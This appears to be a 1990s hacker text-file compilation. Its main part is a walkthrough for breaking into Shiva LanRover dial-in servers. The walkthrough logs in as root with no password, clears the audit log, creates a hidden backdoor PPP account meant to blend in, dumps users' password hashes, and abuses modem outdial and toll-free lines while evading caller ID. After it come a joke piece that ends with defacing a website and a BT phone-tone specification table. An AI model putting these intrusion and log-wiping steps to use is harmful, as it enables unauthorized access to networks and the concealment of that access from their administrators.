The root login will work 9 times out of 10. The reason that the root account
works alot is beacuse in some cases the admin is not even aware the account
even exists! Most of the system setup is done via the main terminal, so the
admin does'nt have to login. the root account is not listed in the userfile
database, so most admin's overlook it. In some cases the admin would have set
up there own acount with somthing like <admin> <password> but if the admin
has any common sense you will not get in with that. Like most OS's, Shiva
systems have an audit log, so don't sit there trying to brute force anything,
once you are in, you can clear the system log, but more on that later. OK,
you've found a Shiva, you've loged on as <root> <no password>, now what? -
read on.

Once loged in, you will be droped into the Shiva command line prompt, which
should look somthing like this:

Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva)
ShivaLanRover/8E# (The command prompt. Can be configured to say anything)

To get a list of the available commands type <help> or <?> this will reveal a
menu similar to this:

ShivaLanRover/8E# ? <enter>

alert Send text alert to all dial-in users
busy-out line <number> Busy-out serial line modem
clear <keyword> Reset part of the system
comment Enter a comment into the log
configure Enter a configuration session
connect <port pool> Connect to a shared serial port
crashdump Write crashblock to log
disable Disable privileges
help List of available commands
initialize <keyword> Reinitialize part of the system
lan-to-lan <keyword> Manage LAN-to-LAN connections
passwd Change password
ping <IP host> Send ICMP echo to IP host
ppp Start a PPP session
quit Quit from shell
reboot Schedule reboot
show <keyword> Information commands, type "show ?" for list
slip Start a SLIP session
telnet <IP host> Start a Telnet session
testline Test a line

The first thing you should do is check to see who is online, at the # prompt
use the show command to reveal the list of current online users:

ShivaLanRover/8E# show users <enter>

Line User Activity Idle/Limit Up/Limit
1 jsmith PPP 0/ 10 0/ None
2 root shell 0/ 10 0/ None
Total users: 2

So here we see ourselves loged in on line 2, and a PPP user on line 1. Note
that most of the time users are not configured to be allowed remote dialin
PPP access, so the user jsmith is probably at a terminal on the LAN. Now you
can see who is online, ie- check the admin is not loged in. Now you need to
get a rough idea of the size of the system and it's network. At the # prompt
type:

ShivaLanRover/8E# show lines <enter>

Async Lines:
Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs
1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0
3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0
6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0
8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0

Here we see a list of the modem ports, as you can see it has 8, this is about
average for most Shiva systems. So now we know how many serial lines there
are, we need to get a rough idea as to how big the network itself is, to do
this type:

ShivaLanRover/8E# show arp <enter>

Protocol Address Age Hardware Addr Type Interface
Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP
Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP
Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP
Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP
Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP
Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP
Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP
Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP
Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP

Showing the arp cache reveals some of the connected boxes to the LAN, aswell
as ethernet address, and type of protocol. Now we have established the kind
of system we are on, it's time to do some exploring, which is where I shall
begin this text file.


2. What can Shiva lan rovers do?

Shiva LanRover systems are very big security weaknesses if installed on any
network. The reason for this is that some of the default settings can be
easily overlooked by the admin. A Shiva system can be configured to provide
a wide variety of network services, some of which are listed here:

PPP (point-to-point protocol) This is the key to gaining access to the
network on which the Shiva is based upon, in most cases the network will have
an internal DNS server, and if you are lucky, the network which the system is
based will be connected to the internet. Hint hint, PPP, toll-free. But just
using a Shiva for free net access would be boring, which is why I am going to
discuss the other features of Shivas.

Modem Outdial. In alot of cases the system would have been configured to
allow modem outdialing which can be good for calling BBS's, diverting to
other dialups, scanning, but again, this is lame, just using a Shiva for
modem outdialing is boring, use your imagination. If you manage to get a PPP
connection, and the system is net connected, you could get online, and at the
same time call your favourite BBS. I'll explain how to do all of this later.

Telnet, ping, traceroute etc. These are the command line tools which will
enable you to determine whether the system is connected to the internet or
not. More on this later.

It's time to go into detail about all of the Shivas functions and commands, I
will concentrate on what you can do with root access, because that is the
only account you are likely to gain access to.


3. The command line

When loged into the Shiva shell, you have the following commands at your
disposal:

alert (Send text alert to all dial-in users) - Self explanitory.
busy-out uart <call-interface> (Busy-out UART port)
clear <keyword> (Reset part of the system)

The clear command is a nice feature of the Shiva system. The first thing you
should do when on a Shiva is make sure you erase all logs of your commands
and login times etc.. to do this all you need to do is type <clear log> This
will erase and reset the audit log, and also any invalid logins to the Shiva.
There are also other clear commands such as <clear arp> etc, but these will
all cause system problems and get you noticed, best leave this alone for the
time being.

comment (Enter a comment into the log)
configure (Enter a configuration session)

Heres the part where you can get the system to do what you want it to do, ie-
to get a PPP connection you will need to set up another account with shell
and PPP privalages. The root account does not allow PPP connections, so here
is where you will need to do your stuff. To get anywhere with a Shiva you
need to create a new account, using the config command you can create a new
user account with greater privalges than root. Before you make a new account
it is a good idea to see what kind of setup the other accounts have on the
system, you don't want to make an account that will stick out from the other
accounts, so type:

show security <enter> (this gives a list of the security configuration and
the user list.) you should see somthing like this:

[UserOptions]
PWAttempts=0
ARARoamingDelimiter=@
ExpireDays=30
GraceLogins=6

[Users]
admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425
jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052
mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052
user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159
another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9
jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821
msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052
dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052
padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1
ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052

Here we get a list of the configured users on the system. As you can see the
admin has made him/herself their own account, while other users have accounts
that allow logins via their terminals, but not remotely. In the above example
all the users have been assigned passwords, so it would be a good idea when
you make your own account to have one aswell. The idea is to make an account
that will blend in with the others and not look to obvious. The passwords in
the external user list are all 3DES (triple DES) encrypted. The type of user
account set up is determined by the options, such as jsmith=/di/do etc, more
on these functions in a bit. OK, now we need to set up our own account, to do
this we need to enter a configuration session, at the command line prompt
type: ShivaLanRover/8E# config <enter>

You will then drop into the configuration session.

Enter configuration file lines. Edit using:
^X, ^U clear line
^H, DEL delete one character
^W delete one word
^R retype line
Start by entering section header in square brackets []
Finish by entering ^D or ^Z on a new line.

config> (here is where you enter the config commands, to make you own account
do the follwing)

config> [users]
config> username=/di/do/sh/tp/pw
config> ^D <------ (type control D to finish)


Review configuration changes [y/n]? y
New configuration parameters:
[users]
username=/di/do/sh/tp/pw
Modify the existing configuration [y/n]? y
You may need to reboot for all changed parameters to take effect.

You've just created your own user account which you can use for PPP
connections etc. To begin with your account is un-passworded, so when you log
back in just hit enter for your password, you can later change this. The /sh
part of the user configuration means you can remotely log into the command
shell, /pw means you have the ability to define your own password, if you
wanted to give yourself another root account, you would use the switch /rt.
In combination with the show config command you can also alter other system
configurations via this method, although it is a very good idea not to
alter anything. Now your account has been set up, all you do is re-connect to
the system and login as your username, more on this later.

connect <PhoneGroup pool> (Connect to a serial port or modem)

This is another one of the good features of Shivas, you can remotely control
a series of modems on the system, and in alot of cases dialout. If you want
to call a BBS, note you cannot upload using Zmodem or similar protocols,
although you would be able to download, but expect a few CRC checksum errors.
To connect to a modem type: connect all_ports <enter> you will then drop into
one of the modem pools, as follows:

Connecting to Serial2 at 115200 BPS.
Escape character is CTRL-^ (30).
Type the escape character followed by C to get back,
or followed by ? to see other options.

(here basic modem commands are nessasary, use the follwing to dialout)

ATZ (initialise modem)
ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial
with be based upon the system PBX, so sometimes you will have to figure out
the outdialing code, which should be somthing simple like dialing a 9 before
the number you want to connect to. To disconnect from the outdialing session
type control C, or ^C. This will take you back to the command line. As with
the other system events, outdialing is loged into the audit file, along with
the number you called. It is generaly a good idea to clear the audit log
after things like PPP or dialout, again just type clear log <enter>.

cping <IP host> (Send continuous ICMP echoes to IP host)
crashdump (Write crashblock to log)
detect (Detect the configuration of an interface)
disable (Disable your root privaleges)
dmc <keyword> (Information commands, type "dmc ?" for list)

down <slot> <firstmodem> (last Remove modems from CCB pool)
info <slot> <modem> (Print info for specified modem)
mupdate <slot> <firstmodem> (l Update Rockwell modem FW)
state (Print state of a modem)
status (Print status of all modems)
trace (Trace message passing)
up <slot> <firstmodem> (lastmo Add modems to CCB pool)
test_1slot <slot> (Tests DMC card in slot specified)
test_allcards (Tests all DMC cards found in system)
test_golden <golden slot> (Tests all DMC cards against a Golden DMC)
test_loopall <count 0-99> (Tests All DMC's for count)
test_modempair <slot1> (modem1 Tests modems against each other)
test_slotpair <slot1> <slot2> (Tests a DMC card against another)
test_xmitloop <s> <m> <s> <m> (Tests modem pair for count)

help (List of available commands)
history (List of previous commands)
initialize <keyword> (Reinitialize part of the system)
l2f <keyword> (L2F commands)

close <nickname> (Close tunnel to L2F HG)
login (Start L2F session)
tunnels (Show open tunnels)

lan-to-lan <keyword> (Manage LAN-to-LAN connections)
passwd (Change password)
ping <IP host> (Send ICMP echo to IP host)
ppp (Start a PPP session)
quit (Quit from shell)
reboot (Schedule reboot)
route <protocol> (Modify a protocol routing table)
rlogin <IP host> (Start an rlogin session)
show <keyword> (Information commands, type "show ?" for list)

show+
account <keyword> (Accounting information)
arp (ARP cache)
bridge <keyword> (Bridging information)
buffers (Buffer usage)
configuration (Stored configuration, may specify sections)

the show config command will reveal all the system configuration setups,
includings DNS server information, security configurations, IP routing etc.
It will also show the internal IPs of radius authentification and TACAS
servers.

show+
finger (Current user status)
interfaces [name1 [name2 ... ] (Interface information)
ip <keyword> (Internet Protocol information, type "show ip ?" for list)

To get an idea of the routing information, and again how big the network is
type, show ip route. This will bring up a routing table, and again give you
an idea as to where the connected boxes are, it is a good idea to note the IP
prefixes.

show+
lan-to-lan (LAN-to-LAN connections)
license (Licensing information)
lines (Serial line information)
log (Log buffer)

The show log command will display the system audit log in more format. Here
you will be able to see what is going on on the system, ie- is it primarily
used for PPP, dialout etc. If users use the system for outdialing, you can
even see the numbers that they dial. Here is a cut down example as to what
you wiuld see in a system log file:

Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in
00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D
00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B)
00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast
00:00 4534 Serial4:PPP: IPCP layer up
00:04 4535 Serial4:PPP: CCP layer up
14:09 4536 Serial4:PPP: IPCP layer down
00:00 4537 Serial4:PPP: CCP layer down
00:00 4538 Serial4:PPP: LCP layer down
00:01 4539 Serial4:PPP: CD dropped on connection
00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,)
00:06 4541 Serial4: Rate 115200bps
00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:01 4543 Serial4: Initialized modem
04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44
18:27 4545 Serial4: New Dial-In session
00:00 4546 Serial4:PPP: LCP layer up
00:00 4547 Serial4: "krad" logged in
00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C
00:00 4549 Dialin:IPX configured net 9823O049
00:00 4550 Serial4:PPP: IPXCP layer up
00:00 4670 Serial4: New Command Shell session
00:03 4671 Serial4: "root" logged in
01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell)
00:06 4673 Serial4: Rate 115200bps
00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W'
00:00 4675 Serial4: Initialized modem
55:11 4676 Could not parse IP SNMP request.

In the system log, you will also see invalid login attempts, error messages,
and general system events. Because the log file logs everything, it is a good
idea to erase your own presence in it.

show+
modem <keyword> (Internal modem information, type "show modem ?" for list)
netbeui <keyword> (NetBeui information, type "show netbeui ?" for list)
novell <keyword> (NetWare information, type "show novell ?" for list)
ppp (PPP multilink bundles and links)
processes (Active system processes)
security (Internal userlist)
semaphores (Active system semaphores)
slot <keyword> (Internal serial slot

  
information, type "show slot ?" for list)
upload (Upload information)
users (Current users of system)
version (General system information, also shows DNS info)
virtual-connections (Virtual Connection information)

slip (Start a SLIP session)
telnet <IP host> (Start a Telnet session)
tftp (Download new image, ie- system config files)
tunnel <IP host> (Start a Tunnel session)
wan [action] <wan interface> (Perform actions on WAN Interface)

4. System security

Shivas can be very weak on security, due to the exposed root account. If the
system is configured properly they can be very secure systems, although this
is usually not the case. There are many security options for the Shiva system
including Radius Authentification, SecurID, TACAS, and just the standard
secured login. In some cases an admin will use a secondary server to act as
the Radius Authentification. In this case, the setup would look somthing like
this.


[RADIUS Authentification Server] } The server contains a secured user
| list, which will be used to verify
| login requests. The login is
[Router] determined if the user can be
| | verified by the server.
| | } The Shiva sends the login request to RADIUS.
[Shiva System] } Starting Radius Authentification... @ Userid:

Sometimes a system will be configured to work with a number of different
Shivas on a network. For example, using the same idea as above, but without
the Radius server, a secondary shiva may be installed to act as the security
server, whereas all other Shiva systems refer to it for user login
verification. This can be a real bitch if you have loged into a system, but
the above setup has been implemented. For example, say you loged in as root,
and you want to set up a PPP account. The first thing you would do is check
to see what kind of setup existing users have by typing <show security> If
the verification server has been setup, there will be no users in the user
list, instead you have to find the network location of the verification
server, and hope it has an un-passworded root account on it. To find the
verification srever, or primary Shiva, just use the show config command. you
can then telnet from the Shiva you are on, to the Shiva displayed in the
config file, you should then get the @ Userid: login screen again, try root
no pass, if this does not work, it is possible to temorarily configure your
own server on the network, but this would mean other users will not be able
to login, so leave this alone. If you do manage to login to the server as
root, you have to setup your user account there, because that is where all
the Shivas on the network refer to in order to verify users, this way the
admin only has to maintain one user configuration file.

5. PPP

Once you have setup a user account with shell and PPP privaleges, you can
begin exploring the network on which the Shiva is based upon. If the network
is net connected you can get free net access aswell, but this is quite risky,
especially if the admin notices PPP sessions active at 4am, with destinations
such as irc.ais.net:6667. When you first establish a PPP connection to a
Shiva server, the first thing you should do is map out the network. To do
this just run a network, or port scanner accross the domain which the Shiva
is on. As on most networks, you are likely to come accross a variety of
different boxes, such as UNIX boxes, SunOS, shared printers, mail servers,
cisco routers, in one case someone I know found an Amiga box@$!. If the
network is net connected, it is a good idea to use your shell for any net
connections, such as IRC. Once you have an external net connection from a
Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS
or any other system. To do this, you would have to find the network address
of the Shiva server you are on, then telnet back to it and re-login. using
the <connect all_ports> command will give you control over the system modems,
then you can dialout as if you where in terminal mode. If the Shiva you are
on is located on a toll-free number, or even local, it is not a good idea to
use it for net access, or stay on it for a long time. If you must use a Shiva
for net access, it is a good idea to use your PSTN routing skills, and not
dialup to the system directly. The mistake people make when it comes to ANI,
or CLID is that they think only 800 numbers have ANI, and residential numbers
have CLID. This is *wrong* the ANI service can be setup by anyone, it's a
choice, not a standard. If you want to route your call, the best thing to do
is route internationaly, so your origionating clid gets striped at intralata
boundarys on the PSTN. A technique, which I don't wanna give out involves
trunk and carrier hoping. We'll thats about it for this file, hope you
enjoyed it. If you want more information on the Shiva Lan Rover system, just
check out shiva.com, they will have technical guides in pdf format, you can
also download the shiva software from their ftp site.

Shouts to the following:

[9x] substance phriend siezer vectorx statd
blotter knight network specialK microdot
katkiller xramlrak bosplaya deadsoul and
nino the 9x g1mp.

[b4b0] gr1p t1p. #9x #darkcyde Efnet.
backa xio.

Bodie (the elite geezer who supplies all my internet
needs and is genrally the elitest bloke in the world)

[D4RKCYDE] downtime elf zomba force mortis
angel dohboy brakis alphavax
tonekilla bishopofhell sintax
digitalfokus mistress.


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: I Encrypt, Therefore I Am

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
7oRrJiSlVzrE1bEEhZR9hnFqogL6QXg=
=lHXD
-----END PGP PUBLIC KEY BLOCK-----


***********************************************
* hybrid_blue@hotmail.com | DSS: 0x5493F1307 *
* th0rn@coldmail.com | D-H: 0x8B314ED9 *
* hybrid@darkcyde.org | RSA: 0xA42A953D *
* th0rn@cyberspace.org | *
* www2.dope.org/9x | 1999-02-09 *
* www.darkcyde.8m.com | *
***********************************************


---(OOooOO)--------How to be 3l337--------------------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-



"well, secOnd by secOnd and minute by minute,
its like lOttO, yOu gOtta be in it tO win it"

this file is for all of you newbies/lamers that wanna be as eleet as
the people who keep calling you names on that newsgroup yes! it can be
done! just follow the simple steps below and you too will be able to
call people names and make yourself look good! what are you waiting
for? get reading!

step 1
+======+
first of all you need to go down to blockbuster video
and rent out Hackers and Wargames watch them both
about 5O times then your ready for step 2

step 2
+======+
you really need a computer to be eleet so beg your father
to get one tell him you need it for homework thats it! now
you have a computer!

step 3
+======+
now you need to be able to access the internet so tell
daddy that you all of your friends can look at teletubbie
websites and you feel left out

step 4
+======+
when daddy's gone out connect to the internet i know it's
very difficult but you have got that nice aol guide that
came free with it haven't you? thats it!

step 5
+======+
you can now search for hacking and phreaking with a search
engine choose the one with the funny name Yahoo! well done

step 6
+======+
go to all of the nice looking hacking and phreaking sites
read all of the writing and look at all of the pictures

step 7
+======+
to be truly eleet you need a (00l-@$$ nickname/handle
either think of one yourself or choose one from the
following list.
o zEr0 c00l
o cRa$h 0VeRiDe
o CeReAl KiLLeR
o aCiD BuRn
the above names [as if you didn't know!] are from
Hackers the film so they must be eleet.

step 8
+======+
get yourself an account with hotmail or yahoo mail and
use your new nickname so try to get something like this:
zEr0_c00l@hotmail.com

step 9
+======+
open up your news server and read all of the posts in
alt.ph.uk alt.26OO alt.26OO.phreakz and alt.phreaking

step 1O
+=======+
it's time for you to make your first post to a newsgroup
i suggest alt.ph.uk look through all of the posts until
you find one saying 'how do i get free calls' or 'does
red boxing still work?' reply to the group so everyone
can see how eleet you are write something like this:
'y0 laMEr! y0u arE s0 laMe i tHiNk i'M g0nNa pUkE,
wHy d0N't Y0u d0 s0mE reSeArCh bef0re y0u p0sT sHiT LikE
ThAt eVeR heArD oF a SEaRch eNgiNe? 0h yeAh teLL y0uR MuM
tHAt sHE 0wEs Me £1000000000000 f0r lAst niGHt l4m3r!'

step 11
+=======+
incase you don't already know all eleet people write funny
with 0's, 1's, 3's and 4's instead of letters. writing like
that shows that you are truly eleet, you may ask why i'm not
writing like that well to tell the truth i'm not eleet, i wish
i was but i'm not

step 12
+=======+
download mIRC and hang out in #phuk #2600-uk #evilhax0rs
#phreak #hacking #hackers and #2600 you should get to know
the regulars in the above channels and you will be able to
go in there anytime and chat about how eleet you are and don't
forget to call anyone you don't know lame and kick ban them
straight away and ALWAYS remember to flame all posts made in
alt.ph.uk it will make you look eleet and cool

step 13
+=======+
learn html and java and use your skills to build your
own webpage call it 'zEr0 c00l's eleet hax0r warez palace'
and have loads of hacking phreaking anarchy cracking virii
warez stuff on there that you took from someone elses site and
pretend you wrote it. post the address to alt.ph.uk and tell
them that if they don't visit it they are lAmE-aSs pieces of
shit

step 14
+=======+
now that you are well respected amoung other eleet people
you should join a hacking/phreaking group and hang out with
the eleet peeps if you can't find one or nobody will let you
join one start your own and call it 'eleet hax0r d00ds'

step 15
+=======+
hack into a big website and change the homepage to say 'zEr0
c00l w0z ere' and leave your e-mail address phone number and
your home address you will get caught arrested and put in prison
without trial this will make you look eleet to everyone else
and you will have achieved your aim! people will have little banners
on their webpages saying 'fReE zEr0 c00l!' well done! but by now you
will be way too eleet for this text file and will have deleted it
and sent me an e-mail telling me how lame i am
oh well...


---(OOooOO)--------BT tones and announcments----------------------------(OOo-
---(OOooOO)--------by force---------------------------------------------(OOo-
---(OOooOO)--------force007@hotmail.com---------------------------------(OOo-


1. SCOPE
¯¯¯¯¯¯¯¯¯¯
This document describes the supervisory tones generated by the BT
network and gives general information about BT network announcements.
Tones and announcements encountered on the BT network can come from
other networks, and customer premises equipment and these are not
covered in this document.

2. NETWORK SUPERVISORY TONES
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
The supervisory tones that will be returned from the BT network are listed in
Table 1.

Table 1. Network Supervisory Tones

+===============================================================================================+
| Network Generated | Significance | Range of levels | Tone Composition| Cadence |
| Tone | | received at BT | ( 5% except | ( 10% except |
| | | network interface | where stated) | where stated) |
|===================|===================|====================|=================|================|
|Proceed Indication |Proceed to dial |0 dBm to - 27 dBm. |350 Hz |Both tones |
|(Dial Tone) |indication |Each tone separately|plus |continuous |
| | |3 dB lower |440 Hz | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Proceed |Proceed to dial |0 dBm to -27dBm. |350 Hz |350 Hz tone - |
|Indication |indication when |Each tone separately|plus |0.75 s ON. |
| |certain |3 dB lower |440 Hz |0.75 s OFF |
| |supplementary | | |plus |
| |services have been | | |440 Hz tone - |
| |invoked | | |continuous |
| | | | |or both tones |
| | | | |pulsed at the |
| | | | |above rate. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Number Busy Tone |Called Customer's |0 dBm to -37 dBm. |400 Hz |0.375 s ON. |
|(Engaged Tone) |line in use | | |0.375 s OFF. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Congestion Tone |Routeing equipment |-6 dBm to -43 dBm. |400 Hz |0.4 s ON. |
|(Path Engaged Tone)|is temporally |0 dBm to -37 dBm. | |0.35 s OFF. |
| |unavailable | | |0.225 s ON. |
| | | | |0.525 s OFF. |
| | | | |Note: Shorter |
| | | | |tone is 6 dBm |
| | | | |higher than the |
| | | | |longer tone. |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Special Congestion |Precedes some |0 dBm to -37 dBm. |400 Hz |400 Hz tone - |
|Tone |congestion | |1004 Hz |0.2 s |
| |announcements | | |1004 Hz tone - |
| | | | |0.3 s |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Connection Not |Call cannot be |0 dBm to -37 dBm. |400 Hz |Continuous |
|Admitted Indication|routed to requested| | | |
|(Number |number | | | |
|Unobtainable Tone) | | | | |
|-------------------|-------------------|--------------------|-----------------|----------------|
|Awaiting Answer |Implies that called|0 dBm to 37 dBm. |400 Hz + 450 Hz |0.4 s ON. |
|Indication |Customers line is | | |0.2 s OFF. |
|(Ringing Tone) |being rung | | |0.4 s ON. |
| | | | |2.0 s OFF. |
| | | | |or 0.35 s ON. |
| | | | |0.22 s OFF. |
| | | | |Then start at |
| | | | |any point in |
| | | | |0.4 s ON. |
| | | | |0.2 s OFF. |
| | | | |0.4 s ON. |
